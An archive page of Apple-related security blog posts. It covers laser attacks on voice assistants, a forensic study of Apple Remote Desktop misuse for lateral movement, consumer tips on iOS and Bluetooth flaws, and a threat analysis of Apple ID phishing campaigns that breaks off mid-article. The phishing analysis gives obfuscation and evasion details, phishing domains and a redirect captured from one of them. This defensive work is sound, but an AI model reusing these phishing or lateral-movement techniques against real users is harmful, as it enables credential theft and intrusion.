Category Archives: apple

Smashing Security #154: A buttock of biometrics

The UK’s Labour Party kicks off its election campaign with claims that it has suffered a sophisticated cyber-attack, Apple’s credit card is accused of being sexist, and what is Google up to with Project Nightingale?

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by John Hawes.

Fooling Voice Assistants with Lasers

Interesting:

Siri, Alexa, and Google Assistant are vulnerable to attacks that use lasers to inject inaudible­ -- and sometimes invisible­ -- commands into the devices and surreptitiously cause them to unlock doors, visit websites, and locate, unlock, and start vehicles, researchers report in a research paper published on Monday. Dubbed Light Commands, the attack works against Facebook Portal and a variety of phones.

Shining a low-powered laser into these voice-activated systems allows attackers to inject commands of their choice from as far away as 360 feet (110m). Because voice-controlled systems often don't require users to authenticate themselves, the attack can frequently be carried out without the need of a password or PIN. Even when the systems require authentication for certain actions, it may be feasible to brute force the PIN, since many devices don't limit the number of guesses a user can make. Among other things, light-based commands can be sent from one building to another and penetrate glass when a vulnerable device is kept near a closed window.

Living off the Orchard: Leveraging Apple Remote Desktop for Good and Evil

Attackers often make their lives easier by relying on pre-existing operating system and third party applications in an enterprise environment. Leveraging these applications assists them with blending in with normal network activity and removes the need to develop or bring their own malware. This tactic is often referred to as Living Off The Land. But what about when that land is an Apple orchard?

In recent enterprise macOS investigations, FireEye Mandiant identified the Apple Remote Desktop application as a lateral movement vector and as a source for valuable forensic artifacts.

Apple Remote Desktop (ARD) was first released in 2002 and is Apple’s “desktop management system for software distribution, asset management, and remote assistance”. An ARD deployment consists of administrator and client machines. While the administrator app must be downloaded from the macOS App Store, the client application is included natively as part of macOS. Client systems must be added to the client list on an administrator system manually, or they can be discovered via Bonjour if they are in the same local subnet as the administrator system. In a typical enterprise environment deployment, managers would be the ARD administrators and have the ability to view, manage, and remotely control their managed personnel’s workstations via ARD.

Lateral Movement

Mandiant has observed attackers using the ARD screen sharing function to move laterally between systems. If remote desktop was not enabled on a target system, Mandiant observed attackers connecting to systems via SSH and executing a kickstart command to enable remote desktop management. This allowed remote desktop access to the target systems. The following is an example from the macOS Unified Log showing a kickstart command used by an attacker to enable remote desktop access for all users with all privileges:


Figure 1: Kickstart command example

During an investigation, you can use a few different artifacts to trace this activity. Execution of the kickstart command modifies the contents of the configuration file /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd to contain the string “enabled”. SSH login activity can be found in the Apple System Logs or Audit Logs. Execution of the kickstart command can be found in the Unified Logs, as seen in Figure 1.

An ARD administrator has a substantial amount of power available to them, similar to compromising an administrator account in a Windows environment. By compromising an account that has access to ARD administrator system, an attacker can perform any of the following actions:

  • Remotely control VNC-enabled machines, including in “Curtain Mode” which hides the remote actions from the local workstation’s screen
  • Transfer files
  • Remotely shut down or restart multiple machines simultaneously
  • Schedule tasks
  • Execute AppleScript and UNIX shell scripts

Apple’s ARD web page and the ARD help page contain more details about ARD’s capabilities.

ARD Reporting as a Forensic Force Multiplier

Along with remote system control functionality, Apple Remote Desktop’s asset management capabilities include conducting remote Spotlight searches, file searching, generating software version information reports, and more importantly, generating application usage and user history reports. The reporting process generally follows these steps:

  1. Client systems compute reports and cache the data locally before transferring them to the administrator system (the default policy is to begin this at 12:00 AM local time, daily).
  2. Data received from clients is cached on the administrator system. Alternatively, a macOS system with the administrator version of ARD installed can be set up as a “Task Server” for a centralized collection option.
  3. Cached data is written to SQLite database on the administrator system

The cached data is stored in various subdirectories under the /private/var/db/RemoteManagement/ parent directory. The directory has the following structure:


Figure 2: /private/var/db/RemoteManagement/ directory structure

This directory structure is present on all systems, but which files exist in which directories depends on whether the system is an ARD client or administrator system.

Artifacts from ARD Client Systems

There is one directory that is the focus for investigations on client systems: /private/var/db/RemoteManagement/caches/. This directory contains the following files, which are the local client data cache that is periodically reported to the administrator system. Do note, however, that these files are routinely deleted by the system, so they may not be present. These files are typically deleted from the client system once they are transmitted to the administrator system. Once transmitted, the data is stored on the administrator system.

File

Description

AppUsage.plist

plist file containing application usage data

AppUsage.tmp

Binary plist file containing application usage data, often the same as or less thorough than AppUsage.plist

asp.cache

Binary plist of system information

filesystem.cache

Database containing an index of the entire file system, including users and groups

sysinfo.cache

Binary plist containing system information, some of which is also present in asp.cache

UserAcct.tmp

Binary plist containing user login activity

Table 1: ARD cache files

In our experience, the most useful information available from these files is application usage and user activity.

Application Usage

The RemoteManagement/caches/AppUsage.plist file contains one key per application, where each key is the full path of the application, such as file:///Applications/Calculator.app/.

Each application key contains a dictionary that includes a “runData” array and a “Name” string, which is the friendly name of the application, such as “Calculator”, as seen in Figure 3.


Figure 3: AppUsage.plist structure

Each “runData” array contains at least one dictionary consisting of the following keys and values:

Key

Value Format

Description

wasQuit

Boolean: true or false

Indicator of whether or not the application was quit prior to the last report time. This field may not exist if the value is not “true”.

Frontmost

Number of seconds

Total duration which the application was “frontmost” on the screen

Launched

macOS absolute timestamp

Time the application was launched

runLength

Number of seconds

Duration the application was run

username

String

User who launched the application

Table 2: AppUsage.plist runData keys and values

Of the two application usage cache artifacts, RemoteManagement/caches/AppUsage.plist usually contains the same or more content than RemoteManagement/caches/AppUsage.tmp.

User Activity

The RemoteManagement/caches/UserAcct.tmp file is a binary plist that contains user activity that can be correlated with other artifacts on a macOS systems, such as the Apple System Logs or Audit Logs. The file contains keys with the short name of each user logged on the system.

Each key contains a dictionary that includes a “uid” string with the user’s UID, and an array for each login type: console, tty, or SSH. Each login-type array contains at least one dictionary consisting of the following keys and values:

Key

Value Format

Description

inTime

macOS absolute timestamp

Time the user logged in

outTime

macOS absolute timestamp

Time the user logged out

host

String

Originating host for remote login. This field has been observed to not be consistently present.

Table 3: UserAcct.tmp keys and values

Artifacts From ARD Administrator Systems

The data outlined in Table 1 is reported to the administrator system daily. The files are then stored in the RemoteManagement/ClientCaches/ directory. Each file is renamed to the MAC address of the reporting system and placed into the appropriate subdirectory, as seen in Table 4. The subdirectories contain the following:

Subdirectory

Data Contained in Each File

ApplicationUsage/

AppUsage.plist files

SoftwareInfo/

Filesystem.cache files

SystemInfo/

Sysinfo.cache files

UserAccounting/

UserAcct.tmp files

Table 4: /private/var/db/RemoteManagement/ClientCaches/ subdirectories

Additionally, there is a plist file, RemoteManagement/ClientCaches/cacheAccess.plist that contains keys of MAC addresses with values of more MAC addresses. The purpose and context for this file has yet to be determined.

The Gold Mine

All the aforementioned data, with the exception of the filesystem.cache files, is added to the main SQLite database RemoteManagement/RMDB/rmdb.sqlite3 (“RMDB”). The RMDB exists on all ARD systems but is only populated on the administrator system. It houses a wealth of information about the systems in the ARD network over a significant timespan. Mandiant has observed data for application usage timestamps from over a year prior to when we acquired a database on a live system.

The RMDB file contains five tables: ApplicationName, ApplicationUsage, PropertyNameMap, SystemInformation, and UserUsage. The following sections detail each table within the database:

ApplicationName

This table is an index for the applications on each system, where each application is assigned an item sequence number (“ItemSeq”) per system. This data is used for correlation in the ApplicationUsage table.

Column

Value Format

Description

ComputerID

String

Client MAC address, no separators

AppName

String

Friendly application name

AppURL

String

Application URL path (i.e. file:///Applications/Calculator.app)

ItemSeq

Integer

ID number for each application, per ComputerID, used for the AppName table

LastUpdated

macOS absolute timestamp

Last report time of the client

Table 5: ApplicationName table columns

ApplicationUsage

The AppName table is unique in the fact the “Frontmost” and “LaunchTime” values in the table are swapped. The research at the time of this blog post was verified on MacOS 10.14 (Mojave).

Column

Value Format

Description

ComputerID

String

Client MAC address, no separators

FrontMost

macOS absolute timestamp

Application launch time

LaunchTime

Number of seconds to 6 decimal places

Total duration the application was “frontmost” on screen

RunLength

Number of seconds to 6 decimal places

Total duration the application was running

ItemSeq

Integer

ItemSeq number for the respective ComputerID, referenced in the ApplicationName table

LastUpdated

macOS absolute timestamp

Last report time of the client

UserName

String

User who launched the application

RunState

Integer

“1” for “running”, or “0” for “terminated” at the time of the last report

Table 6: ApplicationUsage table columns

PropertyNameMap

This table is used as a reference for the SystemInformation table.

Column

Value Format

Description

ObjectName

String

Various elements of a macOS system, such as Mac_HardDriveElement, Mac_USBDeviceElement, Mac_SystemInfoElement

PropertyName

String

Property names for each element, such as ProductName, ProductID, VendorID, VendorName for Mac_USBDeviceElement

PropertyMapID

Integer

ID number for each property, per element

Table 7: PropertyNameMap table columns

SystemInformation

There is a substantial amount of system information collected in this table. This table can be leveraged to extract USB device information, IP addresses, hostnames, and more, of all the reported client systems.

Column

Value Format

Description

ComputerID

String

Client MAC address, with colon separators

ObjectName

String

Elements of a macOS system outlined in the PropertyNameMap table

PropertyName

String

Properties per element outlined in the PropertyNameMap table

ItemSeq

Integer

ID number for each element, i.e. if there are 4 Mac_USBDeviceElement data sets, each one will have an ItemSeq number, 0-3, to group the properties together

Value

String

Data for the respective property

LastUpdated

yyyy-mm-ddThh:mm:ssZ

24 hour local time, last report time of the client. Example: 2019-08-07T02:11:34Z

Table 8: SystemInformation table columns

UserUsage

This table contains the user login activity for all the reported client systems.

Column

Description of Value

ComputerID

Client MAC address, no separators

LastUpdated

macOS absolute timestamp, last report time of the client

UserName

Short name of the user

LoginType

Console, tty, or ssh

inTime

macOS absolute timestamp, time the user logged in

outTime

macOS absolute timestamp, time the user logged out

Host

Originating host for remote login. This field has been observed to not be consistently present.

Table 9: UserUsage table columns

Filesystem Cache

The RemoteManagement/ClientCaches/filesystem.cache file is a database that indexes the files and directories found on a macOS computer’s file system. Rather than using SQLite like the RMDB, ARD uses a custom database implementation to track this information. Fortunately, the database file format is fairly simple, consisting of a file header, six tables, and entries that point to string values. By interpreting the information in the filesystem cache file, an investigator can recreate the directory structure of an ARD-enable system. Mandiant uses this technique to identify and demonstrate the existence of attacker-created files.

The database header, identified by the magic value “hdix”, contains metadata about the database, such as the total number of indexed folders, files, and symlinks. Pointers from this header lead to the six tables: “main”, “names” (file names), “kinds” (file extensions), “versions” (macOS app bundle version infos), “users”, and “groups”. Entries in the “main” table contain references to entries in the other tables; by walking these references, an investigator can recover full file system paths and metadata.

In practice, the filesystem.cache file may be tens of megabytes in size, tracking dozens or hundreds of thousands of file system entries. Figure 4 shows truncated content of a parsed file system cache file; these entries are for the artifacts discussed in this article!


Figure 4: Screenshot of filesystem.cache contents, listing ARD artifacts

On a macOS system, the program “build_hd_index” traverses the file system and indexes the files and directories into filesystem.cache. Figure 5 shows a portion of the documentation for this tool; as expected, the default output directory is [/private]/var/db/RemoteManagement/caches/.


Figure 5: documentation for build_hd_index

Ironically, internet message board posts going back to at least 2007 complain of the performance impact of this tool. A post by “Anonymous” indicates that “build_hd_index” was designed to support file indexing on OS X Panther (2003), which didn’t have Spotlight. Now, 16 years later, we can exploit these artifacts during an incident response.

Introducing: ARDvark

It was evident that if this artifact exists in a future investigation, leveraging its wealth of data will be critical to identifying attacker activities. In some scenarios, investigators may be able to generate reports directly from an ARD administrator system, but this may not always be the case. If not, then investigators would have to rely on manually acquiring and extracting information from the RMDB file on the ARD administrator system. ARDvark is a tool that extracts all user activity and application usage recorded in the RMDB and outputs the data in an analyst-friendly format.

ARDvark will also process the AppUsage.plist and UserAcct.tmp files found on ARD client systems under /private/var/db/RemoteManagement/caches/. Additionally, ARDvark has the capability to parse the filesystem.cache files to produce a file system listing, as well as all users and groups present on the respective system. Please see the FireEye Github for more information.

Detecting and Preventing ARD Abuse

To detect suspicious ARD usage, organizations can monitor for anomalous modification of the /Library/Application Support/Apple/Remote Desktop/RemoteManagement.launchd file to identify remote desktop access enablement where ARD is not used. Analyzing the Unified Logs for evidence of unexpected kickstart commands during threat hunting missions can uncover suspicious ARD usage as well.

Mitigating ARD abuse is reliant upon the principle of least privilege. Mandiant recommends allowing as few remote control privileges as possible, and only allowing administrator privileges to necessary accounts. Apple provides guidance on setting privileges, and authenticating without using local accounts with ARD in the help page and in the ARD user guide. ARD administrators can then routinely generate reports in the ARD application to ensure no changes are made to administration privilege settings.

A Bushel of Evidence

Application usage artifacts for macOS are few and far between. To date, some of the best artifacts for application usage include CoreAnalytics files and the Spotlight database, but none of these artifacts provide the exact time of execution of all applications. While ARD artifacts are not present across every macOS system, if ARD is deployed in an enterprise environment it may provide some of the most valuable data for investigators which you would not uncover otherwise.

User login activity typically exists in the Apple System Logs and Audit Logs, but short log retention is frequently an issue when the average attacker dwell time in 2018 was 78 days. The RMDB provides a potential source of application usage and user login information that is over a year old, long outliving typical log retention times.

The system information available in the RMDB includes IP addresses, USB device information, and more which may be useful to investigators. Also, the file system cache files that are collected contain an extensive file listing of multiple macOS systems, which allows investigators to identify files or users of interest on other systems without having to collect data from the suspect system directly.

ARD is an excellent example of how remote administration tools provide an attack surface for abuse while simultaneously providing a vast amount of data to help piece together malicious activity, all from a single system. If your organization utilizes ARD, consider reviewing the information available through the reporting functionality during threat hunting and future investigative purposes, as the artifact doesn’t fall far from the tree.

iPhone Users: Here’s What You Need to Know About the Latest iOS Hacks

iPhone hacks have often been considered by some to be a rare occurrence. However, a group of Google researchers recently discovered that someone has been exploiting multiple iPhone vulnerabilities for the last two years. How? Simply by getting users to visit a website.

How exactly does this exploitation campaign work? According to WIRED, researchers revealed a handful of websites that had assembled five exploit chains. These exploit chains are tools that link security vulnerabilities together and allow a hacker to penetrate each layer of iOS digital protections. This campaign took advantage of 14 security flaws, resulting in the attacker gaining complete control over a user’s phone. Researchers state that these malicious sites were programmed to assess the Apple devices that loaded them and compromise the devices with powerful monitoring malware if possible. Once the malware was installed, it could monitor live location data, grab photos, contacts, passwords, or other sensitive information from the iOS Keychain.

So, what makes this attack unique? For starters, this exploitation campaign hides in plain sight, uploading information without any encryption. If a user monitored their network traffic, they would notice activity as their data was being uploaded to the hacker’s server. Additionally, a user would be able to see suspicious activity if they connected their device to their computer and reviewed console logs. Console logs show the codes for the programs being run on the device. However, since this method would require a user to take the extra step of plugging their iPhone into a computer, it’s highly unlikely that they would notice the suspicious activity.

Although iOS exploits usually require a variety of complexities to be successful, this exploitation campaign proves that iOS hacking is very much alive and kicking. So, what can Apple users do to help ward off these kinds of attacks? Here’s how you can help keep your device secure:

  • Install automatic updates. In your device settings, choose to have automatic updates installed on your device. This will ensure that you have the latest security patches for vulnerabilities like the ones leveraged in these exploit chains as soon as they’re available.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post iPhone Users: Here’s What You Need to Know About the Latest iOS Hacks appeared first on McAfee Blogs.

Uighurs in China were target of two-year iOS malware attack – reports

Android and Windows devices also targeted in campaign believed to be state-backed

Chinese Uighurs were the target of an iOS malware attack lasting more than two years that was revealed last week, according to multiple reports.

Android and Windows devices were also targeted in the campaign, which took the form of “watering hole attacks”: taking over commonly visited websites or redirecting their visitors to clones in order to indiscriminately attack each member of a community.

Related: China’s hi-tech war on its Muslim minority

Continue reading...

Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks

Many of us use Bluetooth technology for its convenience and sharing capabilities. Whether you’re using wireless headphones or quickly Airdropping photos to your friend, Bluetooth has a variety of benefits that users take advantage of every day. But like many other technologies, Bluetooth isn’t immune to cyberattacks. According to Ars Technica, researchers have recently discovered a weakness in the Bluetooth wireless standard that could allow attackers to intercept device keystrokes, contact lists, and other sensitive data sent from billions of devices.

The Key Negotiation of Bluetooth attack, or “KNOB” for short, exploits this weakness by forcing two or more devices to choose an encryption key just a single byte in length before establishing a Bluetooth connection, allowing attackers within radio range to quickly crack the key and access users’ data. From there, hackers can use the cracked key to decrypt data passed between devices, including keystrokes from messages, address books uploaded from a smartphone to a car dashboard, and photos.

What makes KNOB so stealthy? For starters, the attack doesn’t require a hacker to have any previously shared secret material or to observe the pairing process of the targeted devices. Additionally, the exploit keeps itself hidden from Bluetooth apps and the operating systems they run on, making it very difficult to spot the attack.

While the Bluetooth Special Interest Group (the body that oversees the wireless standard) has not yet provided a fix, there are still several ways users can protect themselves from this threat. Follow these tips to help keep your Bluetooth-compatible devices secure:

  • Adjust your Bluetooth settings. To avoid this attack altogether, turn off Bluetooth in your device settings.
  • Beware of what you share. Make it a habit to not share sensitive, personal information over Bluetooth.
  • Turn on automatic updates. A handful of companies, including Microsoft, Apple, and Google, have released patches to mitigate this vulnerability. To ensure that you have the latest security patches for vulnerabilities such as this, turn on automatic updates in your device settings.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Boost Your Bluetooth Security: 3 Tips to Prevent KNOB Attacks appeared first on McAfee Blogs.

How to Build Your 5G Preparedness Toolkit

5G has been nearly a decade in the making but has really dominated the mobile conversation in the last year or so. This isn’t surprising considering the potential benefits this new type of network will provide to organizations and users alike. However, just like with any new technological advancement, there are a lot of questions being asked and uncertainties being raised around accessibility, as well as cybersecurity. The introduction of this next-generation network could bring more avenues for potential cyberthreats, potentially increasing the likelihood of denial-of-service, or DDoS, attacks due to the sheer number of connected devices. However, as valid as these concerns may be, we may be getting a bit ahead of ourselves here. While 5G has gone from an idea to a reality in a short amount of time for a handful of cities, these advancements haven’t happened without a series of setbacks and speedbumps.

In April 2019, Verizon was the first to launch a next-generation network, with other cellular carriers following closely behind. While a technological milestone in and of itself, some 5G networks are only available in select cities, even limited to just specific parts of the city. Beyond the not-so widespread availability of 5G, internet speeds of the network have performed at a multitude of levels depending on the cellular carrier. Even if users are located in a 5G-enabled area, if they are without a 5G-enabled phone they will not be able to access all the benefits the network provides. These three factors – user location, network limitation of certain wireless carriers, and availability of 5G-enabled smartphones – must align for users to take full advantage of this exciting innovation.

While there is still a lot of uncertainty surrounding the future of 5G, as well as what cyberthreats may emerge as a result of its rollout, there are a few things users can do to prepare for the transition. To get your cybersecurity priorities in order, take a look at our 5G preparedness toolkit to ensure you’re prepared when the nationwide roll-out happens:

  • Follow the news. Since the announcement of a 5G enabled network, stories surrounding the network’s development and updates have been at the forefront of the technology conversation. Be sure to read up on all the latest to ensure you are well-informed to make decisions about whether 5G is something you want to be a part of now or in the future.
  • Do your research. With new 5G-enabled smartphones about to hit the market, ensure you pick the right one for you, as well as one that aligns with your cybersecurity priorities. The right decision for you might be to keep your 4G-enabled phone while the kinks and vulnerabilities of 5G get worked out. Just be sure that you are fully informed before making the switch and that all of your devices are protected.
  • Be sure to update your IoT devices factory settings. 5G will enable more and more IoT products to come online, and most of these connected products aren’t necessarily designed to be “security first.” A device may be vulnerable as soon as the box is opened, and many cybercriminals know how to get into vulnerable IoT devices via default settings. By changing the factory settings, you can instantly upgrade your device’s security and ensure your home network is secure.
  • Add an extra layer of security.As mentioned, with 5G creating more avenues for potential cyberthreats, it is a good idea to invest in comprehensive mobile security to apply to all of your devices to stay secure while on-the-go or at home.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post How to Build Your 5G Preparedness Toolkit appeared first on McAfee Blogs.

Downloaded FaceApp? Here’s How Your Privacy Is Now Affected

If you’ve been on social media recently, you’ve probably seen some people in your feed posting images of themselves looking elderly. That’s because FaceApp, an AI face editor that went viral in 2017, is making a major comeback with the so-called FaceApp Challenge — where celebrities and others use the app’s old age filter to add decades onto their photos. While many folks have participated in the fun, there are some concerns about the way that the app operates when it comes to users’ personal privacy.

According to Forbes, over 100,000 million people have reportedly downloaded FaceApp from the Google Play Store and the app is the number one downloaded app on the Apple App Store in 121 different countries. But what many of these users are unaware of is that when they download the app, they are granting FaceApp full access to the photos they have uploaded. The company can then use these photos for their benefit, such as training their AI facial recognition algorithm. And while there is currently nothing to indicate that the app is taking photos for malicious intent, it is important for users to be aware that their personal photos may be used for other purposes beyond the original intent.

So, how can users enjoy the entertainment of apps like FaceApp without sacrificing their privacy? Follow these tips to help keep your personal information secure:

  • Think before you upload. It’s always best to err on the side of caution with any personal data and think carefully about what you are uploading or sharing. A good security practice is to only share personal data, including personal photos, when it’s truly necessary.
  • Update your settings. If you’re concerned about FaceApp having permission to access your photos, it’s time to assess the tools on your smartphone. Check which apps have access to information like your photos and location data. Change permissions by either deleting the app or changing your settings on your device.
  • Understand and read the terms. Consumers can protect their privacy by reading the Privacy Policy and terms of service and knowing who they are dealing with.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Downloaded FaceApp? Here’s How Your Privacy Is Now Affected appeared first on McAfee Blogs.

Rotten Apples: Apple-like Malicious Phishing Domains

At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains. This system observed some phishing domains registered in the first quarter of 2016 that were designed to appear as legitimate Apple domains. These phony Apple domains were involved in phishing attacks against Apple iCloud users in China and UK. In the past we have observed several phishing domains targeting Apple, Google and Yahoo users; however, these campaigns are unique as they are serving the same malicious phishing content from different domains to target Apple users.

Since January 2016 we have observed several phishing campaigns targeting the Apple IDs and passwords of Apple users. Apple provides all of its customers with an Apple ID, a centralized personal account that gives access to iCloud and other Apple features and services such as the iTunes Store and App Store. Users will provide their Apple ID to sign in to iCloud[.]com, and use the same Apple ID to set up iCloud on their iPhone, iPad, iPod Touch, Mac, or Windows computer.

iCloud ensures that users always have the latest versions of their important information –  including documents, photos, notes, and contacts – on all of their Apple devices. iCloud provides an easy interface to share photos, calendars, locations and more with friends and family, and even helps users find their device if they lose it. Perhaps most importantly, its iCloud Keychain feature allows user to store passwords and credit card information and have it entered automatically on their iOS devices and Mac computers.

Anyone with access to an Apple ID, password and some additional information, such as date of birth and device screen lock code, can completely take over the device and use the credit card information to impersonate the user and make purchases via the Apple Store.

This blog highlights some highly organized and sophisticated phishing attack campaigns we observed targeting Apple customers.

Campaign 1: Zycode phishing campaign targeting Apple's Chinese Customers

This phishing kit is named “zycode” after the value of a password variable embedded in the JavaScript code which all these domains serve in their HTTP responses.

The following is a list of phishing domains targeting Apple users detected by our automated system in March 2016. None of these domains are registered by Apple, nor are they pointing to Apple infrastructure:

The list shows that the attackers are attempting to mimic websites related to iTunes, iCloud and Apple ID, which are designed to lure and trick victims into submitting their Apple IDs.

Most of these domains appeared as an Apple login interface for Apple ID, iTunes and iCloud. The domains were serving highly sophisticated, obfuscated and suspicious JavaScripts, which was creating the phishing HTML content on the web page. This technique is effective against anti-phishing systems that rely on the HTML content and analyze the forms.

From March 7 to March 12, the following domains used for Apple ID phishing were observed, all of which were registered by a few entities in China using a qq[.]com email address: iCloud-Apple-apleid[.]com, Appleid-xyw[.]com, itnues-appid[.]com, AppleidApplecwy[.]com, appie-itnues[.]com, AppleidApplecwy[.]com, Appleid-xyw[.]com, Appleid-yun-iCloud[.]com, iCloud-Apple-apleid[.]com, iphone-ioslock[.]com, iphone-appdw[.]com.

From March 13 to March 20, we observed these new domains using the exact same phishing content, and having similar registrants: iCloud-Appleid-yun[.]win, iClouddd[.]top, iCloudee[.]top, iCloud-findip[.]com, iCloudhh[.]top, ioslock-Apple[.]com, ioslock-iphone[.]com, iphone-iosl0ck[.]com, lcloudmid[.]com

On March 30, we observed the following newly registered domains serving this same content: iCloud-mail-Apple[.]com, Apple-web-icluod[.]com, Apple-web-icluodid[.]com, AppleidAppleiph[.]com , icluod-web-ios[.]com and ios-web-Apple[.]com

Phishing Content and Analysis

Phishing content is usually available in the form of simple HTML, referring to images that mimic a target brand and a form to collect user credentials. Phishing detection systems look for special features within the HTML content of the page, which are used to develop detection heuristics. This campaign is unique as a simple GET request to any of these domains results in an encoded JavaScript content in the response, which does not reveal its true intention unless executed inside a web browser or a JavaScript emulator. For example, the following is a brief portion of the encoded string taken from the code.

This encoded string strHTML goes through a complex sequence of around 23 decrypting/decoding functions that include number system conversions, pseudo-random pattern modifiers followed by XOR decoding using a fixed key or password “zycode” for the actual HTML phishing content to be finally created (refer to Figure 15 and Figure 16 in Appendix 1 for complete code). Phishing detection systems that rely solely on the HTML in the response section will completely fail to detect the code generated using this technique.

Once loaded into the web browser, this obfuscated JavaScript creates an iCloud phishing page. This page is shown in Figure 1.

Figure 1: The page created by the obfuscated JavaScript as displayed in the browser

The page is created by the de-obfuscated content seen in Figure 2.

Figure 2: Deobfuscated content

Burp Suite is a tool to secure and penetrate web applications: https://portswigger[.]net/burp/.  The Burp session of a user supplying login and password to the HTML form is shown in Figure 3. Here we can see 5 variables (u,p,x,y and cc) and a cookie being sent via HTTP POST method to the page save.php.

Figure 3: Burp session

After the user enters a login and password, they are redirected and presented with the following Chinese Apple page, seen in Figure 4:  http://iClouddd[.]top/ask2.asp?MNWTK=25077126670584.html

Figure 4: Phishing page

On this page, all the links correctly point towards Apple[.]com, as can be seen in the HTML:

  * Apple <http://www.Apple[.]com/cn/>
  * <http://www.Apple[.]com/cn/shop/goto/bag>
  * Apple <http://www.Apple[.]com/cn/>
  * Mac <http://www.Apple[.]com/cn/mac/>
  * iPad <http://www.Apple[.]com/cn/ipad/>
  * iPhone <http://www.Apple[.]com/cn/iphone/>
  * Watch <http://www.Apple[.]com/cn/watch/>
  * Music <http://www.Apple[.]com/cn/music/>
  * <http://www.Apple[.]com/cn/support/>
  * Apple[.]com <http://www.Apple[.]com/cn/search>
  * <http://www.Apple[.]com/cn/shop/goto/bag>

Apple ID <https://Appleid.Apple[.]com/account/home>

  * <https://Appleid.Apple[.]com/zh_CN/signin>
  * Apple ID <https://Appleid.Apple[.]com/zh_CN/account>
  * <https://Appleid.Apple[.]com/zh_CN/#!faq>

When translated using Google Translate, the Chinese text written in the middle of the page (Figure 4) reads: “Verify your birth date or your device screen lock to continue”.

Next the user was presented with an ask3.asp webpage shown in Figure 5.

 

Figure 5: Phishing form asking for more details from victims

Translation: “Please verify your security question”

As shown in Figure 5, the page asks the user to answer three security questions, followed by redirection to an ok.asp page (Figure 6) on the same domain:

Figure 6: Successful submission phishing page

The final link points back to Apple[.]com. The complete trail using Burp suite tool is shown in Figure 7.

Figure 7: Burp session

We noticed that if the user tried to supply the same Apple ID twice, they got redirected to the page save[.]asp shown in Figure 8. Clicking OK on the popup redirected the user back to the main page.

Figure 8: Error prompt generated by phishing page

Domain Registration Information

We found that the registrant names for all of these phony Apple domains were these Chinese names: “Yu Hu” and “Wu Yan”, “Yu Fei” and “Yu Zhe”. Moreover, all these domains were registered with qq[.].com email addresses. Details are available in Table 1 below.

Table 1: Domain registration information

Looking closer at our malicious domain detection system, we observed that the system had been seeing similar domains at an increasing frequency. Analyzing the registration information, we found some interesting patterns. Since January 2016 to the time of writing, the system marked around 240 unique domains that have something to do with Apple ID, iCloud or iTunes. From these 240 domains, we identified 154 unique email registrants with 64 unique emails pointing to qq[.]com, 36 unique Gmail email accounts, and 18 unique email addresses each belonging to 163[.]com and 126[.]com, and a couple more registered with 139[.]com.

This information is vital, as it could be used in following different ways:

  • The domain list provided here could be used by Apple customers as a blacklist; they can avoid browsing to such domains and providing credentials to any of the listed domains, whether they receive them via SMS, email or via any instant messaging service.
  • The Apple credential phishing detection teams could use this information, as it highlights that all domains registered with these email addresses, registrant names and addresses, as well as their combinations, are potentially malicious and serving phishing content. This information could be used to block all future domains registered by the same entities.
  • Patterns emerging from this data reveal that for such campaigns, attackers prefer to use email addresses from Chinese services such as qq.com, 126.com and 138.com. It has also been observed that instead of names, the attackers have used numbers (such as 545454@qq[.]com and 891495200@qq[.]com) in their email addresses.
Geo-location:

As seen in Figure 9, we observed all of these domains pointing to 13 unique IP addresses distributed across the U.S. and China, suggesting that these attacks were perhaps targeting users from these regions.

Figure 9: Geo-location plot of the IPs for this campaign

Campaign 2: British Apples Gone Bad

Our email attacks research team unearthed another targeted phishing campaign against Apple users in the UK. Table 2 is a list of 86 Apple phishing domains that we observed since January 2016.

 

Figure 9: Geo-location plot of the IPs for this campaign
Phishing Content and Analysis

All of these domains have been serving the same phishing content. A simple HTTP GET (via the wget utility) to the domain’s main page reveals HTML code containing a meta-refresh redirection to the signin.php page.

A wget session is shown here:

$ wget http://manageAppleid84913[.]net

--2016-04-05 16:47:44--  http://manageAppleid84913[.]net/

Resolving manageAppleid84913[.]net (manageAppleid84913[.]net)... 109.123.121.10

Connecting to manageAppleid84913[.]net (manageAppleid84913[.]net)|109.123.121.10|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 203 [text/html]

Saving to: ‘index.html.1’

 

100%[============================================================================================================>] 203         --.-K/s   in 0s      

 

2016-04-05 16:47:44 (37.8 MB/s) - ‘index.html.1’ saved [203/203]

Content of the page is displayed here:

<meta http-equiv="refresh" content="0;URL=signin.php?c=ODcyNTA5MTJGUjU0OTYwNTQ5NDc3MTk3NTAxODE2ODYzNDgxODg2NzU3NA==&log=1&sFR=ODIxNjMzMzMxODA0NTE4MTMxNTQ5c2RmZ3M1ZjRzNjQyMDQzNjgzODcyOTU2MjU5&email=" />

 

This code redirects the browser to this URL/page:

http://manageAppleid84913[.]net/signin.php?c=OTYwNzUyNjlGUjU0OTYwNTQ5NDY0MDgxMjQ4OTQ5OTk0MTQ3MDc1NjYyOA==&log=1&sFR=ODc0MjQyNTEyNzMyODE1NTMxNTQ5c2RmZ3M1ZjRzNjQzMDU5MjUzMzg4NDMzNzE1&email=#

This loads a highly obfuscated JavaScript in the web browser that, on execution, generates the phishing HTML code at runtime to evade signature-based phishing detection systems. This is seen in Figure 17 in Appendix 2, with a deobfuscated version of the HTML code being shown in Figure 18.

This code renders in the browser to create the fake Apple ID phishing webpage seen in Figure 10, which resembles the authentic Apple page https://Appleid.Apple[.]com/.

Figure 10: Screenshot of the phishing page as seen by the victims in the browser

On submitting a fake username and password, the form gets submitted to signin-box-disabled.php and the JavaScript and jQuery creates the page seen in Figure 11, informing the user that the Apple ID provided has been locked and the user must unlock it:

Figure 11: Phishing page suggesting victims to unlock their Apple IDs

